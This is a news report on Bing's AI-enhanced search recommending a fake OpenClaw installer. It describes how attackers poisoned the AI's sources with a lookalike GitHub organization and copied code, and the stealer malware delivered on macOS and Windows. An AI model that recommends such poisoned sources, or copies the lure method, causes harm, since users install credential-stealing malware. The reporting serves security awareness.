The report states that Microsoft's Bing search has been polluted, incorrectly recommending the malicious OpenClaw AI project.

2026-04-08 02:19:19

IT Home, March 6 news: Tech media bleepingcomputer published a blog post yesterday (March 5), claiming that Microsoft Bing’s AI-enhanced search feature has a BUG. Its search results incorrectly recommended a fake OpenClaw installer hosted on GitHub.

Researchers at the cybersecurity firm Huntress found last month that when users interact with Bing and search the OpenClaw keyword, the search results include a recommendation for a fake project page hosted on GitHub.

OpenClaw itself is a widely popular open-source AI agent. It can act as a personal assistant to perform all kinds of tasks and has very high permissions, including access to local files and integration with email, messaging apps, and online services.

Hackers precisely took advantage of these broad system access permissions, recognizing an excellent opportunity to steal sensitive information, and began widely publishing malicious instruction files and fake installer packages on platforms such as GitHub.

Huntress’s analysis found that the hackers carefully disguised these malicious GitHub code repositories to trick both AI systems and users. They not only created a dedicated GitHub organization named “openclaw-installer,” but also copied the source code from the real project to boost legitimacy.

The researchers emphasized that simply hosting malware under seemingly legitimate newly created GitHub accounts is enough to pollute Bing AI’s search results and gain recommendation weighting.

For users of different operating systems, the hackers deployed differentiated attack payloads. This malicious repository provides macOS users with a fake installation guide, prompting users to paste and execute bash commands in the terminal, which directly triggers the download of a data-stealing software called Atomic Stealer.

As for Windows users, the hackers distribute a forged “OpenClaw_x64.exe” file that silently runs the Vidar stealing program in memory to steal account data, and implants the GhostSocks trojan to turn the victim’s computer into a hacker-controlled jump node.

IT Home note: The original article only mentioned that Microsoft Bing is subject to being “poisoned,” and has not yet found any content related to Google Search.

View Original

This page may contain third-party content, which is provided for information purposes only (not representations/warranties) and should not be considered as an endorsement of its views by Gate, nor as financial or professional advice. See Disclaimer for details.